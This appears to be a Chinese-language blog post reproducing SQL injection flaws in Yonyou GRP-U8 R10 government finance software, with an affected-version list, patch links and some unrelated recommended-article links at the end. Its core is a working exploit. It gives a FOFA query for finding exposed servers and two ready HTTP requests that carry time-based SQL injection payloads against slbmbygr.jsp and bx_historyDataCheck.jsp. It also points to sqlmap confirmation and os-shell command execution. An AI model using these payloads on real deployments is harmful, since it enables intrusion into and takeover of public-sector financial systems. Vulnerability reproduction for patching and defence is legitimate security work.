用友GRP-U8 SQL注入漏洞复现

0x01 产品简介

用友GRP-U8R10行政事业财务管理软件是用友公司专注于国家电子政务事业,基于云计算技术所推出的新一代产品,是我国行政事业财务领域最专业的政府财务管理软件。

0x02 漏洞概述

用友GRP-U8的bx_historyDataCheck jsp、slbmbygr.jsp等接口存在SQL注入漏洞,由于用友GRP-U8未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞,进一步利用可造成主机失陷。

0x03 影响范围

用友GRP-U8R10 U8Manager B、C、G 系列产品 < 20230905

0x04 复现环境

FOFA:app="用友-GRP-U8"

0x05 漏洞复现

PoC-1

复制代码
GET /u8qx/slbmbygr.jsp?gsdm=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: your-ip

延时5秒

Sqlmap验证

PoC-2

复制代码
POST /u8qx/bx_historyDataCheck.jsp HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

userName=';WAITFOR DELAY '0:0:6'--&class.module.classLoader.DefaultAssertionStatus=

延时6秒

利用os-shell命令执行

0x06 修复建议

目前官方已发布更新补丁,获取安全补丁方式如下:

  1. 百度云盘:https://pan.baidu.com/s/1cQIxlUkpYAxE508EXjgQxA 提取码:n1xy

  2. 用友云盘:https://pan.yonyou.com/s/gUWlv8QkSsY密码:a61h

下载【20230905-关于用友GRP-U8 bx_historyDataCheck jsp存在SQL注入漏洞的解决方案.zip】

更新用友GRP-U8 Manager产品的2023年10月份(日期大于等于均可)标准补丁也可以修复此问题。

相关推荐
小小龙学IT36 分钟前
现代 C++ 内存管理与资源安全深度解析:从 RAII 到所有权模型
c++·安全
IT小盘2 小时前
25-让大模型安全调用外部工具-参数权限超时控制
前端·python·安全
云水一下2 小时前
零基础玩转bWAPP靶场(六十五):SQLiteManager XSS
web安全·xss·bwapp·sqlitemanager·cve-2012-5105·bee-box
移动云开发者联盟2 小时前
密态计算落地!MobileClaw解锁安全AI新范式
大数据·人工智能·安全
安科瑞-小李2 小时前
SST 固态变压器如何构建安全防线?全域在线监测标准化配置方案
安全·新能源·固态变压器·sst
HackTwoHub2 小时前
开箱即用 AI 渗透测试系统,整合多类AI工具、Web安全、内网攻防、二进制逆向、API测试、流量分析等多个安全领域
人工智能·安全·web安全·网络安全·系统安全·网络攻击模型·安全架构
独隅12 小时前
Cursor 安全插件链:构建实时 SAST/DAST 辅助分析工作流
安全
吴声子夜歌13 小时前
网络安全——网络渗透测试(网络扫描)
网络·web安全·php
fish-man13 小时前
ceshi ceshi yixia
网络·安全·web安全
科技新资讯15 小时前
防护加密流量中的API接口安全有哪些安全产品措施
安全·系统安全